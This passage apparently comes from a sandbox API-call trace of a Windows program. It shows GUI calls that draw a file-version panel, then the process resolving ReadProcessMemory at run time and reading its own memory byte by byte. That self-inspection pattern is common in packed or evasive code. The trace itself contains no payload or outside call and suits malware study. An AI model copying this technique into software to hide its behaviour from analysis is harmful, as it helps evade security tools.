(hWnd=0x10120, nIndex=-16) returned 113967104 [0300.532] GetClientRect (in: hWnd=0x10120, lpRect=0x18f00c | out: lpRect=0x18f00c) returned 1 [0300.532] MapWindowPoints (in: hWndFrom=0x10120, hWndTo=0x0, lpPoints=0x18f00c, cPoints=0x2 | out: lpPoints=0x18f00c) returned 20250929 [0300.533] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0300.533] GetFocus () returned 0x10120 [0300.533] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x18eff0 | out: lpWndClass=0x18eff0) returned 1 [0300.533] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0300.533] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0300.533] GetWindowLongA (hWnd=0x1010e, nIndex=0) returned 4923548 [0300.534] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0300.534] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0300.534] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0300.534] VarAnd (in: pvarLeft=0x18f6f4, pvarRight=0x18f704, pvarResult=0x18f6e4 | out: pvarResult=0x18f6e4) returned 0x0 [0300.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0300.536] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.536] CreateCompatibleBitmap (hdc=0x300107a0, cx=1440, cy=900) returned 0x4a05021c [0300.541] CreateCompatibleDC (hdc=0x300107a0) returned 0xc010216 [0300.541] SelectObject (hdc=0xc010216, h=0x4a05021c) returned 0x185000f [0300.541] SetBkMode (hdc=0xc010216, mode=1) returned 2 [0300.541] OleTranslateColor () returned 0x0 [0300.541] SetBkColor (hdc=0xc010216, color=0xf0f0f0) returned 0xffffff [0300.541] OleTranslateColor () returned 0x0 [0300.541] UnrealizeObject (h=0x1010021e) returned 1 [0300.541] FillRect (hDC=0xc010216, lprc=0x18f5a8, hbr=0x1010021e) returned 1 [0300.541] OleCreatePictureIndirect () returned 0x0 [0300.544] SelectObject (hdc=0xc010216, h=0x103007cf) returned 0x1b00017 [0300.544] SelectObject (hdc=0xc010216, h=0x1e0a07b2) returned 0x18a002e [0300.544] SelectObject (hdc=0xc010216, h=0x1900011) returned 0x1900010 [0300.544] SetBrushOrgEx (in: hdc=0xc010216, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0300.544] UnrealizeObject (h=0x1900015) returned 1 [0300.544] SelectObject (hdc=0xc010216, h=0x1900015) returned 0x1900011 [0300.544] SetBkMode (hdc=0xc010216, mode=1) returned 1 [0300.544] OleTranslateColor () returned 0x0 [0300.544] SetBkColor (hdc=0xc010216, color=0xf0f0f0) returned 0xf0f0f0 [0300.544] OleTranslateColor () returned 0x0 [0300.544] SetTextColor (hdc=0xc010216, color=0x0) returned 0x0 [0300.544] GetROP2 (hdc=0x300107a0) returned 13 [0300.545] SetROP2 (hdc=0xc010216, rop2=13) returned 13 [0300.545] SelectObject (hdc=0x300107a0, h=0x1b00016) returned 0x103007cf [0300.545] SelectObject (hdc=0x300107a0, h=0x18a002e) returned 0x1e0a07b2 [0300.545] SelectObject (hdc=0x300107a0, h=0x1900015) returned 0x1900015 [0300.545] SelectPalette (hdc=0x300107a0, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0300.545] OleTranslateColor () returned 0x0 [0300.545] OleTranslateColor () returned 0x0 [0300.545] UnrealizeObject (h=0x1010021e) returned 1 [0300.545] OleTranslateColor () returned 0x0 [0300.545] OleTranslateColor () returned 0x0 [0300.545] SetTextColor (hdc=0xc010216, color=0x0) returned 0x0 [0300.545] SetBkColor (hdc=0xc010216, color=0xf0f0f0) returned 0xf0f0f0 [0300.545] FillRect (hDC=0xc010216, lprc=0x18f5cc, hbr=0x1010021e) returned 1 [0300.545] SetTextColor (hdc=0xc010216, color=0x0) returned 0x0 [0300.545] SetBkColor (hdc=0xc010216, color=0xf0f0f0) returned 0xf0f0f0 [0300.545] SysStringLen (param_1="Full filename: ") returned 0xf [0300.545] SysStringLen (param_1="Full filename: ") returned 0xf [0300.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x18f5e4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full filename: ", lpUsedDefaultChar=0x0) returned 15 [0300.545] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="Full filename: ", c=15, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.546] TabbedTextOutA (hdc=0xc010216, x=0, y=0, lpString="Full filename: ", chCount=15, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852032 [0300.547] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.547] SysStringLen (param_1="\r\n") returned 0x2 [0300.547] SysStringLen (param_1="\r\n") returned 0x2 [0300.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0300.547] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.547] TabbedTextOutA (hdc=0xc010216, x=64, y=0, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0300.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0300.547] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.547] SysStringLen (param_1="File version: ") returned 0xe [0300.547] SysStringLen (param_1="File version: ") returned 0xe [0300.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x18f5e4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File version: \x18", lpUsedDefaultChar=0x0) returned 14 [0300.547] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="File version: \x18", c=14, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.547] TabbedTextOutA (hdc=0xc010216, x=0, y=13, lpString="File version: \x18", chCount=14, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852027 [0300.548] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.548] SysStringLen (param_1="\r\n") returned 0x2 [0300.548] SysStringLen (param_1="\r\n") returned 0x2 [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0300.548] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.548] TabbedTextOutA (hdc=0xc010216, x=59, y=13, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0300.548] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.548] SysStringLen (param_1="Product version: ") returned 0x11 [0300.548] SysStringLen (param_1="Product version: ") returned 0x11 [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x18f5e0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Product version: ö\x18", lpUsedDefaultChar=0x0) returned 17 [0300.548] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="Product version: ö\x18", c=17, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.548] TabbedTextOutA (hdc=0xc010216, x=0, y=26, lpString="Product version: ö\x18", chCount=17, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852048 [0300.548] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.548] SysStringLen (param_1="\r\n") returned 0x2 [0300.548] SysStringLen (param_1="\r\n") returned 0x2 [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0300.548] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.548] TabbedTextOutA (hdc=0xc010216, x=80, y=26, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0300.548] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.548] SysStringLen (param_1="File flags: ") returned 0xc [0300.548] SysStringLen (param_1="File flags: ") returned 0xc [0300.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x18f5e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File flags: z\x8d\x99rXö\x18", lpUsedDefaultChar=0x0) returned 12 [0300.549] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="File flags: z\x8d\x99rXö\x18", c=12, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.549] TabbedTextOutA (hdc=0xc010216, x=0, y=39, lpString="File flags: z\x8d\x99rXö\x18", chCount=12, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852015 [0300.549] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.549] SysStringLen (param_1="\r\n") returned 0x2 [0300.549] SysStringLen (param_1="\r\n") returned 0x2 [0300.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0300.549] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.549] TabbedTextOutA (hdc=0xc010216, x=47, y=39, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0300.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0300.549] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.549] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0300.549] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0300.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x18f5e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File OS: UnknownXö\x18", lpUsedDefaultChar=0x0) returned 16 [0300.549] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="File OS: UnknownXö\x18", c=16, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.549] TabbedTextOutA (hdc=0xc010216, x=0, y=52, lpString="File OS: UnknownXö\x18", chCount=16, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852054 [0300.549] InvalidateRect (hWnd=0x10120, lpRect=0x0, bErase=1) returned 1 [0300.550] SysStringLen (param_1="\r\n") returned 0x2 [0300.550] SysStringLen (param_1="\r\n") returned 0x2 [0300.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0300.550] GetTextExtentPoint32A (in: hdc=0xc010216, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0300.550] TabbedTextOutA (hdc=0xc010216, x=86, y=52, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0303.538] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.538] LoadLibraryA (lpLibFileName="KERNEL32 ") returned 0x759c0000 [0303.538] SetErrorMode (uMode=0x8001) returned 0x8001 [0303.538] GetProcAddress (hModule=0x759c0000, lpProcName="ReadProcessMemory") returned 0x759ecfcc [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400101, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400102, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400103, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400104, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400105, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400106, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.538] GetLastError () returned 0x0 [0303.538] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400107, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400108, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400109, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400110, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400111, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400112, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400113, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400114, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400115, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400116, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400117, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400118, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400119, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.539] GetLastError () returned 0x0 [0303.539] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400120, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400121, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400122, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400123, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400124, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400125, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400126, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400127, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400128, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400129, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400130, lpBuffer=0x18f6b4, nSize=0x4, 